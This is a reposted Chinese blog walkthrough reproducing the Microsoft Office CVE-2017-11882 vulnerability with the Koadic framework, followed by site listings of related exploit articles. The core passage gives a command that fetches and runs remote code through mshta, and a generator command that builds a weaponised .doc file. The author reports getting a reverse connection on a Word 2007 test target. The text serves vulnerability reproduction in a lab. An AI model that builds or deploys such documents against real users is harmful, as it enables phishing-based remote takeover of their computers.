CVE-2017-11882复现配合koadic

最新推荐文章于 2023-12-02 16:55:05 发布
最新推荐文章于 2023-12-02 16:55:05 发布
阅读量78 收藏
点赞数
原文链接:http://www.cnblogs.com/sch01ar/p/7875726.html
版权

项目地址:https://github.com/iBearcat/CVE-2017-11882

首先开启koadic,然后配置一下

复制这句代码

mshta http://192.168.220.132:9999/dHem0

 然后生成doc文件

┌─[root@sch01ar]─[/sch01ar/CVE-2017-11882]
└──╼ #python Command_CVE-2017-11882.py -c "mshta http://192.168.220.132:9999/dHem0" -o sch01ar.doc

 

注:命令长度不能超过43 bytes

然后拿到靶机里测试

打开文件(word测试版本为2007)

目标主机反弹成功

 

转载于:https://www.cnblogs.com/sch01ar/p/7875726.html

andiao1218
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2017-12615-master.zip
09-04
CVE-2017-12615漏洞利用工具;CVE-2017-12615漏洞利用工具;
CVE-2017-11882
12-09
CVE-2017-11882,用于创建钓鱼word,可以添加命令,用来反弹shell,可以用powershell
node.js koa实现命令注入漏洞
zxのdream
08-26 2268
使用koa写的命令注入漏洞题
CVE-2017-7921漏洞复现
qq_22132931的博客
05-12 1991
CVE-2017-7921漏洞复现
Microsoft Office (CVE-2017-11882CVE-2022-30190) 漏洞复现
oiadkt的博客
04-23 558
Microsoft Office (CVE-2017-11882CVE-2022-30190) 漏洞复现
CVE-2017-15715漏洞复现
xiao_he0123的博客
03-28 3540
vulhub通关记录前言Apache HTTPD 换行解析漏洞(CVE-2017-15715)通关步骤1.首先先开启环境2.漏洞复现ActiveMQ Deserialization Vulnerability (CVE-2015-5254)开启环境漏洞复现总结 前言 Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身 Apache HTTPD 换行解析漏洞(CVE-
vulhub中spring的CVE-2017-4971漏洞复现
yougexiaojiuguan的博客
12-02 732
漏洞复现过程中的记录,也是为了方便自己
CVE-2017-15715 漏洞复现
博客
03-24 4409
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页,在2.4.0~2.4.29版本 存在一个解析漏洞,在解析php时,1.php\x0A将按照php后缀进行解析,导致绕过一些服务器的安全 策略。
CVE-2017-11882漏洞复现过程中遇到的一些小问题
weixin_44375751的博客
01-24 3814
一、实验环境 靶机:Windows7 office2003 IP:192.168.87.129 渗透机:Kali Linux 2021.4a IP:192.168.87.130 问题1:安装的office2003中插入-对象中没有Microsoft 公式 3.0 解决方法:工具-自定义-命令 类别“插入”中找到命令“公式编辑器” 将其拖到工具栏中,点击图标,提示该功能尚未安装,点击是进行安装。 二、使用POC代码生成word文件 root@kali:~/Desktop/CV...
CVE-2017-10271漏洞复现
qq_36594628的博客
07-27 5050
CVE-2017-10271复现 一、启动环境 ​ 靶机:ubantu20.04 IP:192.168.3.115 ​ 攻击机:win10 IP:192.168.1.238 ​ 在ubantu 20.04 搭建 Vulhub 环境中已经介绍了怎么启动环境。 二、漏洞信息 ​ WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,近期发现此漏洞的利用方式为传播挖矿程序。 (一)、漏洞描述 ​ 在了解CVE-2017
CVE-2017-12615漏洞复现
weixin_44831109的博客
03-30 1313
1.靶场172.168.20.176(内网的外网访问不到) 2.使用goby 发现8080端口开放以及一个高危漏洞 发现CVE-2017-12615漏洞 3.使用burpsuit抓包 发送給重发器 将get方法改成put方法 上传一个jsp一句话木马 更改发送到右边显示这样说明成功 木马成功上传 4.使用冰蝎 连接密码是冰蝎默认的 root权限 ...
CVE-2017-11882CVE-2017-11882(通杀Office 2003到2016)
03-04
CVE-2017-11882概述 从突破利用效果来看,它可以通杀Office 2003到2016的所有版本,并且整个攻击环境的内置非常简单。此突破是由Office软件里面的[公式编辑器]造成的,由于编辑器进程没有对举个例子,如果黑客利用这...
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
CVE-2017-7269远程代码执行回显验证 我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017...
74LS90实现十进制计数器、百进制计数器-multisim电路仿真设计
最新发布
06-14
该文件包含两个由74LS90设计的十进制计数器与百进制计数器,通过四引脚数码管显示加法计数,并且可以实现清零效果。电路由multisim软件电路仿真设计,电路设计详尽解析可见主页博文。
【抖音方案】2021年个人抖音账号打造执行方案-抖音账号运营方案.pptx
06-14
【抖音方案】2021年个人抖音账号打造执行方案-抖音账号运营方案.pptx
C++与操作系统等面试题83
06-14
C++与操作系统等面试题83
大模型知识的简单学习架构2024
06-14
大模型知识的简单学习架构
cve-2017-7504漏洞复现
08-23
对于CVE-2017-7504漏洞的复现,请注意以下几个步骤: 1. 确认受影响的软件版本:CVE-2017-7504是一个Apache Struts 2框架中的远程代码执行漏洞。在复现之前,请确保目标系统运行的是受影响的Apache Struts 2版本。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值